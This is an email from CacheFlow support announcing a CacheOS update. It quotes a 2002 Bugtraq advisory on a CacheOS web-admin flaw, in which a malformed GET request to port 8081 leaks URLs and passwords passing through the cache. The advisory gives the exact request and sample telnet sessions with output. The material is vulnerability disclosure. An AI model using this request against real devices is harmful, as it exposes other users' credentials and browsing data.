Hello All: The purpose of this email is to advise you that CacheFlow Inc. has provided a software update for the potential issue outlined in your January 8, 2002 email addressed to 'bugtraq@securityfocus.com.' An updated version of software is now available for all supported CacheFlow hardware platforms, and may be obtained by CacheFlow customers at the following URL: http://download.cacheflow.com/ The specific reference to the software update is contained within the Release Notes for CacheOS Versions 4.0.14, Release ID 17085 and 17087, as follows: http://download.cacheflow.com/release/SA/4.0.14/relnotes.htm http://download.cacheflow.com/release/CA/4.0.14/relnotes.htm .SR 1-1350501: This update modified a condition where sending "GET" to the console port could result in an illegible message. This update addresses the potential BugTraq security issue. Upon your download and use of this update, CacheFlow Inc. is requesting your acknowledgement by responding to this email, of the modification provided. In addition, we would like to request that you forward the above-stated update information to your original mailing list. We thank you for your time. Please feel free to contact me should you have any questions or if I can provide you with any additional information. _____________________________________________ Dirk Campbell Director, CacheFlow Customer Support CacheFlow Inc. 650 Almanor Avenue Sunnyvale, CA 94085 Direct Phone: 408.220.2231 Fax: 408.220.2250 http://www.cacheflow.com/ "Making the Internet Content-Smart" -----Original Message----- From: Bjorn Djupvik [mailto:bugtraq@svindel.net] Sent: Tuesday, January 08, 2002 5:15 PM To: bugtraq@securityfocus.com Cc: tommy@svindel.net Subject: svindel.net security advisory - web admin vulnerability in CacheOS ---------------------------------------------------------------------------- ------------------- SECURITY ADVISORY No: 001 (yay, our first!) Credits: svindel.net research team Date published: 01/08/2002 First discovered: 10/31/2001 Title: Cacheflow CacheOS[tm] web admin vulnerability ---------------------------------------------------------------------------- ------------------- Description: CacheOS is a piece of software used by web caching devices made by Cacheflow (www.cacheflow.com), basically an Intel based box with a RAID array and a custom OS. The CacheFlow has a web-admin interface open at port 8081 by default. By sending a certain request, malicious hosts can view parts of web pages and url's transferred through the cache at the time. Examples of data that may be gathered using this method are, usernames/passwords, form contents, url's etc.. This exploit was tested on various CacheOS v3.1.* boxes and all were vulnerable, we did not test on 4.* versions. Exploit: telnet or use nc to connect to port 8081, then issue the following command: GET /Secure/Local/console/cmhome.htm Now legally in http you should also supply something like HTTP/1.0 at the end of that string, if you do that then the cache replies that my station is not authorized to view page. If you omit HTTP/1.0 like I did above, most times the cache just issues this: ---------------------------------------------------------------------------- ------------------- Example exploit session: localhost:~# telnet cacheflow 8081 Trying xxx.xxx.xxx.xxx... Connected to cacheflow. Escape character is '^]'. GET /Secure/Local/console/cmhome.htm HTTP/1.0 200 OK Request cannot be honored Connection closed by foreign host ---------------------------------------------------------------------------- ------------------- But if you try multiple times it will sometimes return something like this: ---------------------------------------------------------------------------- ------------------- localhost:~# telnet cacheflow 8081 Trying xxx.xxx.xxx.xxx... Connected to cacheflow. Escape character is '^]'. GET /Secure/Local/console/cmhome.htm HTTP/1.0 404-Not Found <HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The request ed URL "/Secure/Local/console/cmhome.htm Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234 acbe &sid=3c234acbec234acbe&ord=1" was not found on this server.<P></BODY>Connection closed by foreign host. ---------------------------------------------------------------------------- ------------------- As you can see, the chunk of code it blurted out in the 404 page contained part of an url that a client on the cache was visiting at the time. We have also been able to read passwords from URL's using this technique. There are probably more ways to exploit this and greater holes to be found, but we didn't find any.. feel free to poke around :) Vendor status: support@cacheflow.com were contacted on 10/31/2001 and we got a quick reply asking us for more information, however no information of patches or fixes were supplied to us so we don't know if this is fixed in the latest versions of CacheOS or not. Since such a long time has passed, we are now releasing this advisory. ---------------------------------------------------------------------------- ------------------- [c] 2002 svindelegget
